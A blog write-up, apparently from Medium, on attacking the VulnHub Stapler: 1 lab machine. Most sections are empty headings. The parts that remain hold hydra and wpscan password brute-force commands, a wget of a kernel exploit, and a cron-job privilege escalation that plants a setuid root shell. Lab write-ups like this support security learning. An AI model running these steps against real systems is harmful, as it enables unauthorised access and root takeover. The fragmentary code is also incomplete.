VulnHub — Stapler: 1


Victim Description:

Information Gathering:

nmap -sn -n

FTP Enumeration:

Truncated passwd file

SSH Enumeration:

hydra -L sshusers -P /pentest/password-recovery/SecLists/Passwords/darkc0de.txt -e nsr ssh

SMB Enumeration:

Port 666 Enumeration:

Web Enumeration:

sudo wpscan — url — enumerate u,ap — disable-tls-checks — log /home/ptester/Stapler/wpscan_41.txt

WPScan: Plugins
WPScan: Enumerated Users
WPScan: Enumerated Users 10–20

WordPress Exploit:

import ssl

ssl._create_default_https_context = ssl._create_unverified_context

MySQL Enumeration:

WordPress Brute Force:

sudo wpscan — url — disable-tls-checks — usernames /home/ptester/Stapler/wp_users.txt — wordlist /pentest/password-recovery/dictionary/Passwords/Leaked-Databases/rockyou.txt — log /home/ptester/Stapler/wp_creds.txt

Remote Shell:

Method 1 — WordPress Plugin:

Method 2 — MySQL, SELECT Statement:

Local Information Gathering and Enumeration:

Privilege Escalation:

Method 1 — Stored Password:

Method 2 — Kernel Exploit:

wget on Stapler
SimpleHTTPServer on second attacking system

Method 3 — Cron Job:

echo ‘int main(void)




execl(“/bin/sh”, “sh”, 0);

}’ > rootpriv.c

echo ‘chown root:root /tmp/rootpriv; chmod u+s /tmp/rootpriv;’ > /usr/local/sbin/





Cyber Security Enthusiast

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Mike Bond

Mike Bond

Cyber Security Enthusiast

More from Medium

LFI Inclusion — Try Hack Me

Hack The Box — Dancing

What should you do to secure yourself on the internet? The best practices to follow!

Malware History: I LOVE YOU